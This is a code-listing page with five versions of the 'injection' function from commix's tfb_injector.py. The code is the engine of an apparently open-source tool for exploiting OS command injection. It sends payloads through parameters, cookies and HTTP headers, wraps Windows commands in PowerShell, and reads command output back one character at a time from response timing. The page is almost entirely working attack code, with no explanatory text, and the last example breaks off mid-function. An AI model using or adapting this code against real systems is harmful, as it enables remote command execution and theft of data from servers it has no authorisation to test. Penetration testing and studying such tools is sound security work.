コード例 #1
0
ファイル: tfb_injector.py プロジェクト: BMaChina/commix
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response):
  
  if settings.TARGET_OS == "win":
    previous_cmd = cmd
    if alter_shell:
      cmd = "\"" + cmd + "\""
    else: 
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim()"

  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1

  found_chars = False
  info_msg = "Retrieving the length of execution output... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()  
  for output_length in range(int(minlen), int(maxlen)):
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)  
   
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
      payload = base64.b64encode(payload)
    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
    
    # Examine time-responses
    injection_check = False
    if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
      injection_check = True

    if injection_check == True:   
      if output_length > 1:
        if settings.VERBOSITY_LEVEL >= 1:
          print "\n"
        else:
          sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL+ "]\n")
          sys.stdout.flush()
        success_msg = "Retrieved " + str(output_length) + " characters."  
        print settings.print_success_msg(success_msg)
      found_chars = True
      injection_check = False
      break

  # Proceed with the next (injection) step!
  if found_chars == True :
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    output = []
    percent = "0.0"

    info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE 
    info_msg += "', please wait... [ " +str(percent)+ "% ]"
    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
    sys.stdout.flush()

    for num_of_chars in range(1, int(num_of_chars)):
      if num_of_chars == 1:
        # Checks {A..Z},{a..z},{0..9},{Symbols}
        char_pool = range(65, 90) + range(96, 122)
      else:
        # Checks {a..z},{A..Z},{0..9},{Symbols}
        char_pool = range(96, 122) + range(65, 90)
      char_pool = char_pool + range(48, 57) + range(32, 48) + range(90, 96)  + range(57, 65)  + range(122, 127) 
      for ascii_char in char_pool:
        # Get the execution ouput, of shell execution.
        if alter_shell :
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)

        if settings.TAMPER_SCRIPTS['base64encode']:
          payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
          payload_msg = payload.replace("\n", "\\n") 
          sys.stdout.write("\n" + settings.print_payload(payload_msg))

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
          how_long = custom_header_injection_test(url, vuln_parameter, payload)

        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
        
        # Examine time-responses
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
          injection_check = True
        if injection_check == True:
          if not settings.VERBOSITY_LEVEL >= 1:
            output.append(chr(ascii_char))
            percent = ((num_of_chars*100)/output_length)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(output_length * 1.0)),2))

            info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE 
            info_msg += "', please wait... [ " +str(float_percent)+ "% ]"
            sys.stdout.write("\r" + settings.print_info_msg(info_msg))
            sys.stdout.flush()

          else:
            output.append(chr(ascii_char))
          injection_check = False   
          break
    check_end  = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)

  else:
    check_start = 0
    if not settings.VERBOSITY_LEVEL >= 1:
      sys.stdout.write("[" +Fore.RED+ " FAILED " + Style.RESET_ALL+ "]")
      sys.stdout.flush() 
    else:
      print "" 
    check_how_long = 0
    output = ""

  return check_how_long, output
コード例 #2
0
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response):
  
  if settings.TARGET_OS == "win":
    previous_cmd = cmd
    if alter_shell:
      cmd = "\"" + cmd + "\""
    else: 
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim()"

  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1

  found_chars = False
  info_msg = "Retrieving the length of execution output... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()  
  if settings.VERBOSITY_LEVEL > 1:
    print ""
  for output_length in range(int(minlen), int(maxlen)):
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, timesec, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, timesec, http_request_method)  
   
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    # Check for base64 / hex encoding
    payload = checks.perform_payload_encoding(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL == 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
    elif settings.VERBOSITY_LEVEL > 1:
      info_msg = "Generating a payload for injection..."
      print settings.print_info_msg(info_msg)
      print settings.print_payload(payload) 

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      how_long = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
    
    # Examine time-responses
    injection_check = False
    if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
      injection_check = True

    if injection_check == True:   
      if output_length > 1:
        if settings.VERBOSITY_LEVEL >= 1:
          pass
        else:
          sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL+ "]\n")
          sys.stdout.flush()
        if settings.VERBOSITY_LEVEL == 1:
          print ""
        success_msg = "Retrieved " + str(output_length) + " characters." 
        print settings.print_success_msg(success_msg)
      found_chars = True
      injection_check = False
      break

  # Proceed with the next (injection) step!
  if found_chars == True :
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    output = []
    percent = "0.0"
    info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... "
    if menu.options.verbose < 1 :
      info_msg +=  "[ " +str(percent)+ "% ]"
    elif menu.options.verbose == 1 :
      info_msg +=  ""
    else:
      info_msg +=  "\n"  
    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
    sys.stdout.flush()
    for num_of_chars in range(1, int(num_of_chars)):
      char_pool = checks.generate_char_pool()  
      for ascii_char in char_pool:
        # Get the execution ouput, of shell execution.
        if alter_shell :
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)
        
        # Check for base64 / hex encoding
        payload = checks.perform_payload_encoding(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          payload_msg = payload.replace("\n", "\\n") 
          sys.stdout.write("\n" + settings.print_payload(payload_msg))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print settings.print_info_msg(info_msg)
          print settings.print_payload(payload) 

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
          how_long = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
          how_long = custom_header_injection_test(url, vuln_parameter, payload)

        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
        
        # Examine time-responses
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
          injection_check = True
        if injection_check == True:
          if not settings.VERBOSITY_LEVEL >= 1:
            output.append(chr(ascii_char))
            percent = ((num_of_chars*100)/output_length)
            float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%"
            if percent == 100:
              float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE 
            info_msg += "', please wait... [ " + float_percent + " ]"
            sys.stdout.write("\r" + settings.print_info_msg(info_msg))
            sys.stdout.flush()

          else:
            output.append(chr(ascii_char))
          injection_check = False   
          break
    check_end  = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)

  else:
    check_start = 0
    if not settings.VERBOSITY_LEVEL >= 1:
      sys.stdout.write("[" +Fore.RED+ " FAILED " + Style.RESET_ALL+ "]")
      sys.stdout.flush() 
    else:
      print "" 
    check_how_long = 0
    output = ""

  if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
    print "" 
  return check_how_long, output
コード例 #3
0
ファイル: tfb_injector.py プロジェクト: jack51706/commix
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  found_chars = False

  sys.stdout.write("(*) Retrieving the length of execution output... ")
  sys.stdout.flush()  
  for output_length in range(int(minlen), int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)  

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    if menu.options.base64:
      payload = base64.b64encode(payload)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
   
    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
    
    if how_long >= delay:
      if output_length > 1:
        if menu.options.verbose:
          print "\n"
        else:
          sys.stdout.write("["+Fore.GREEN+" SUCCEED "+ Style.RESET_ALL+"]\n")
          sys.stdout.flush()
        print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters."+ Style.RESET_ALL
        found_chars = True
      break

  if found_chars == True :
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = []
    
    percent = 0
    sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ "+str(percent)+"% ]")
    sys.stdout.flush()

    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(32, 129):
        
        # Get the execution ouput, of shell execution.
        if alter_shell :
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
          payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
        
        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
          if not menu.options.verbose:
            output.append(chr(ascii_char))
            percent = ((num_of_chars*100)/output_length)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(output_length * 1.0)),2))
            
            sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ "+str(float_percent)+"% ]")
            sys.stdout.flush()
          else:
            output.append(chr(ascii_char))
          break

    check_end  = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)

  else:
    check_start = 0
    if not menu.options.verbose:
      sys.stdout.write("["+Fore.RED+" FAILED "+ Style.RESET_ALL+"]\n")
      sys.stdout.flush() 
    else:
      print "" 
    check_how_long = 0
    output = ""

  return  check_how_long, output
コード例 #4
0
ファイル: tfb_injector.py プロジェクト: reposities/commix
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
              http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
              alter_shell, filename, url_time_response):

    if settings.TARGET_OS == "win":
        previous_cmd = cmd
        if alter_shell:
            cmd = "\"" + cmd + "\""
        else:
            cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim()"

    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write(settings.INFO_SIGN +
                     "Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):
        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)
        if menu.options.base64:
            payload = base64.b64encode(payload)
        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            how_long = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url, delay,
                                        url_time_response)
        # Examine time-responses
        injection_check = False
        # if settings.TARGET_OS == "win" :
        #   if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
        #     injection_check = True
        # else:
        if (how_long >= settings.FOUND_HOW_LONG
                and how_long - delay >= settings.FOUND_DIFF):
            injection_check = True

        if injection_check == True:
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
                                     Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(
                    output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            injection_check = False
            break

    # Proceed with the next (injection) step!
    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()
        if settings.TARGET_OS == "win":
            cmd = previous_cmd
        output = []
        percent = "0.0"
        sys.stdout.write("\r" + settings.INFO_SIGN +
                         "Grabbing the output from '" + OUTPUT_TEXTFILE +
                         "', please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()
        for num_of_chars in range(1, int(num_of_chars)):
            if num_of_chars == 1:
                # Checks {A..Z},{a..z},{0..9},{Symbols}
                char_pool = range(65, 90) + range(96, 122)
            else:
                # Checks {a..z},{A..Z},{0..9},{Symbols}
                char_pool = range(96, 122) + range(65, 90)
            char_pool = char_pool + range(48, 57) + range(32, 48) + range(
                90, 96) + range(57, 65) + range(122, 127)
            for ascii_char in char_pool:
                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
                                                    num_of_chars, ascii_char,
                                                    delay, http_request_method)
                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)
                if menu.options.base64:
                    payload = base64.b64encode(payload)
                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter,
                                                     payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter,
                                                      payload)

                # Check if defined custom header with "INJECT_HERE" tag
                elif settings.CUSTOM_HEADER_INJECTION:
                    how_long = custom_header_injection_test(
                        url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url,
                                                delay, url_time_response)
                # Examine time-responses
                injection_check = False
                # if settings.TARGET_OS == "win" :
                #   if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
                #     injection_check = True
                # else:
                if (how_long >= settings.FOUND_HOW_LONG
                        and how_long - delay >= settings.FOUND_DIFF):
                    injection_check = True
                if injection_check == True:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(
                            round(
                                ((num_of_chars * 100) / (output_length * 1.0)),
                                2))
                        sys.stdout.write("\r" + settings.INFO_SIGN +
                                         "Grabbing the output from '" +
                                         OUTPUT_TEXTFILE +
                                         "', please wait... [ " +
                                         str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    injection_check = False
                    break
        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL +
                             "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        output = ""

    return check_how_long, output
コード例 #5
0
ファイル: tfb_injector.py プロジェクト: security-geeks/commix
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response):
  
  if settings.TARGET_OS == "win":
    previous_cmd = cmd
    if alter_shell:
      cmd = "\"" + cmd + "\""
    else: 
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim()"

  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1

  found_chars = False
  info_msg = "Retrieving the length of execution output... "
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()  
  if settings.VERBOSITY_LEVEL > 1:
    print ""
  for output_length in range(int(minlen), int(maxlen)):
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, timesec, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, timesec, http_request_method)  
   
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL == 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
    elif settings.VERBOSITY_LEVEL > 1:
      info_msg = "Generating a payload for injection..."
      print settings.print_info_msg(info_msg)
      print settings.print_payload(payload) 

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      how_long = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
    
    # Examine time-responses
    injection_check = False
    if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
      injection_check = True

    if injection_check == True:   
      if output_length > 1:
        if settings.VERBOSITY_LEVEL >= 1:
          pass
        else:
          sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL+ "]\n")
          sys.stdout.flush()
        if settings.VERBOSITY_LEVEL == 1:
          print ""
        info_msg = "Retrieved: " + str(output_length)
        print settings.print_info_msg(info_msg)
      found_chars = True
      injection_check = False
      break

  # Proceed with the next (injection) step!
  if found_chars == True :
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    output = []
    percent = "0.0"
    info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... "
    if menu.options.verbose < 1 :
      info_msg +=  "[ " +str(percent)+ "% ]"
    elif menu.options.verbose == 1 :
      info_msg +=  ""
    else:
      info_msg +=  "\n"  
    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
    sys.stdout.flush()
    for num_of_chars in range(1, int(num_of_chars)):
      char_pool = checks.generate_char_pool(num_of_chars)  
      for ascii_char in char_pool:
        # Get the execution ouput, of shell execution.
        if alter_shell :
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, timesec, http_request_method)
        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)
        
        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          payload_msg = payload.replace("\n", "\\n") 
          sys.stdout.write("\n" + settings.print_payload(payload_msg))
        elif settings.VERBOSITY_LEVEL > 1:
          info_msg = "Generating a payload for injection..."
          print settings.print_info_msg(info_msg)
          print settings.print_payload(payload) 

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
          how_long = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
          how_long = custom_header_injection_test(url, vuln_parameter, payload)

        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)
        
        # Examine time-responses
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF):
          injection_check = True
        if injection_check == True:
          if not settings.VERBOSITY_LEVEL >= 1:
            output.append(chr(ascii_char))
            percent = ((num_of_chars*100)/output_length)
            float_percent = str("{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2))) + "%"
            if percent == 100:
              float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            info_msg = "Grabbing the output from '" + OUTPUT_TEXTFILE 
            info_msg += "', please wait... [ " + float_percent + " ]"
            sys.stdout.write("\r" + settings.print_info_msg(info_msg))
            sys.stdout.flush()

          else:
            output.append(chr(ascii_char))
          injection_check = False   
          break
    check_end  = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)

  else:
    check_start = 0
    if not settings.VERBOSITY_LEVEL >= 1:
